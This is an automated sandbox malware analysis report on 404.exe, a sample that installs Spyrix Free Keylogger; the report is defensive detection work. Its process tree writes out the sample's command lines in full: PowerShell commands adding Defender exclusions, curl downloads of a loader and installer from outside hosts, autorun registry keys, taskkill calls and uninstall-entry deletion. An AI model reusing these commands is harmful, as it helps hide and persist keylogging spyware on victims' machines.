Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
404.exe

Overview

General Information

Sample name:404.exe
Analysis ID:1523866
MD5:d15daef371b50fb739401bfde29df35a
SHA1:d916c598aff72aaf461a5427cd7c6440c199ff24
SHA256:ee8a52deddf45bac9caa60205f83488ee644ffd1ea01998774d68c7f46568b71
Tags:exefiledn-comuser-JAMESWT_MHT
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Creates an undocumented autostart registry key
Found stalling execution ending in API Sleep call
Loading BitLocker PowerShell Module
Machine Learning detection for sample
PE file has nameless sections
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses cmd line tools excessively to alter registry or file data
Uses netstat to query active network connections and open ports
Uses regedit.exe to modify the Windows registry
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • 404.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\404.exe" MD5: D15DAEF371B50FB739401BFDE29DF35A)
    • cmd.exe (PID: 4252 cmdline: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 344 cmdline: reg query "HKU\S-1-5-19\Environment" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • powershell.exe (PID: 1528 cmdline: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • curl.exe (PID: 7320 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • curl.exe (PID: 7352 cmdline: curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • 404.exe (PID: 7660 cmdline: "C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" MD5: 0F335D8996D82DA30FE9286C671FA0CD)
        • 404.tmp (PID: 7676 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" MD5: BFA3F09DEEE00832D000F497EC5B570A)
          • cmd.exe (PID: 7752 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7796 cmdline: C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • WMIC.exe (PID: 7812 cmdline: wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)
          • cmd.exe (PID: 7856 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\d.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • WMIC.exe (PID: 7920 cmdline: wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value MD5: E2DE6500DE1148C7F6027AD50AC8B891)
          • cmd.exe (PID: 7988 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 8040 cmdline: reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 8064 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\pswd.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 8072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 8120 cmdline: powershell.exe add-mpPreference -ExclusionProcess '404.*' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 1252 cmdline: powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 3652 cmdline: powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 4704 cmdline: powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 400 cmdline: powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 6992 cmdline: powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 7556 cmdline: powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 7408 cmdline: powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 2024 cmdline: powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • cmd.exe (PID: 7712 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex.cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 4516 cmdline: reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user~1\AppData\Local\Temp\is-NKDPA.tmp\ex" /y MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • taskkill.exe (PID: 7784 cmdline: "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • taskkill.exe (PID: 7928 cmdline: "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
            • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • regedit.exe (PID: 5772 cmdline: "regedit.exe" /e "C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid" "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" MD5: BD63D72DB4FA96A1E0250B1D36B7A827)
          • reg.exe (PID: 8084 cmdline: "reg.exe" delete "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
            • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • spkl.exe (PID: 5132 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe" MD5: 11ADE4625528B6E7E1601681867E094E)
            • cmd.exe (PID: 3924 cmdline: "C:\Windows\system32\cmd.exe" /c netstat.exe -e > "C:\Users\user~1\AppData\Local\Temp\nse" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • NETSTAT.EXE (PID: 3396 cmdline: netstat.exe -e MD5: 9DB170ED520A6DD57B5AC92EC537368A)
            • qrl.exe (PID: 3020 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions MD5: D9EA512EE580ECFFEE587A4C3759527F)
              • conhost.exe (PID: 1588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • qrl.exe (PID: 4008 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions MD5: D9EA512EE580ECFFEE587A4C3759527F)
              • conhost.exe (PID: 2676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • qrl.exe (PID: 6208 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions MD5: D9EA512EE580ECFFEE587A4C3759527F)
              • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • spmm.exe (PID: 4900 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22" MD5: C0E67E8723775249CA0AE2C52E7EDD9E)
            • qrl.exe (PID: 7324 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions MD5: D9EA512EE580ECFFEE587A4C3759527F)
              • conhost.exe (PID: 4360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • qrl.exe (PID: 7440 cmdline: "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_83C0CF468771E10150E77501F8BEB4AB https://spyrix.net/dashboard/prg-actions MD5: D9EA512EE580ECFFEE587A4C3759527F)
              • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 2980 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
            • cmd.exe (PID: 2008 cmdline: "C:\Windows\System32\cmd.exe" /c plist.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 4432 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
              • timeout.exe (PID: 5652 cmdline: timeout 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
              • cmd.exe (PID: 7508 cmdline: cmd /c exit 83 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • cmd.exe (PID: 6104 cmdline: cmd /c exit 112 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • cmd.exe (PID: 4376 cmdline: cmd /c exit 121 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • cmd.exe (PID: 3588 cmdline: cmd /c exit 114 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • cmd.exe (PID: 6108 cmdline: cmd /c exit 105 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • cmd.exe (PID: 7424 cmdline: cmd /c exit 120 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • tasklist.exe (PID: 1416 cmdline: TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH MD5: 0A4448B31CE7F83CB7691A2657F330F1)
              • find.exe (PID: 2356 cmdline: find "spm" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • cmd.exe (PID: 6552 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 2824 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
            • chrome.exe (PID: 744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/ MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
              • chrome.exe (PID: 4240 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1884,i,11941437958654227887,11152764312835152294,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\is-BG5BA.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    SourceRuleDescriptionAuthorStrings
    00000049.00000000.3114492355.0000000000401000.00000020.00000001.01000000.00000019.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      00000033.00000002.3190059842.0000000000401000.00000040.00000001.01000000.00000015.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        00000033.00000003.2960715891.00000000044A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          SourceRuleDescriptionAuthorStrings
          73.0.spmm.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4252, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", ProcessId: 1528, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4252, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", ProcessId: 1528, ProcessName: powershell.exe
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp, ParentProcessId: 7676, ParentProcessName: 404.tmp, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , ProcessId: 2980, ProcessName: wscript.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp, ProcessId: 7676, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\localSPM
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4252, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", ProcessId: 1528, ProcessName: powershell.exe
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, CommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\404.exe", ParentImage: C:\Users\user\Desktop\404.exe, ParentProcessId: 6276, ParentProcessName: 404.exe, ProcessCommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, ProcessId: 4252, ProcessName: cmd.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\is-TGL7N.tmp\404.tmp" /SL5="$303F4,32862490,227328,C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp, ParentProcessId: 7676, ParentProcessName: 404.tmp, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs" , ProcessId: 2980, ProcessName: wscript.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp, ProcessId: 7676, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kbdsprt
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", CommandLine|base64offset|contains: i~yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /c C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\\d55b5edc-beb4-4418-b1de-2b3817e31a87.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4252, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe add-mpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87'", ProcessId: 1528, ProcessName: powershell.exe
            No Suricata rule has matched

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 404.exeReversingLabs: Detection: 76%
            Source: 404.exeVirustotal: Detection: 75%Perma Link
            Source: 404.exeJoe Sandbox ML: detected
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_0025C770 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,65_2_0025C770
            Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exeCode function: 65_2_00259BC0 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,65_2_00259BC0
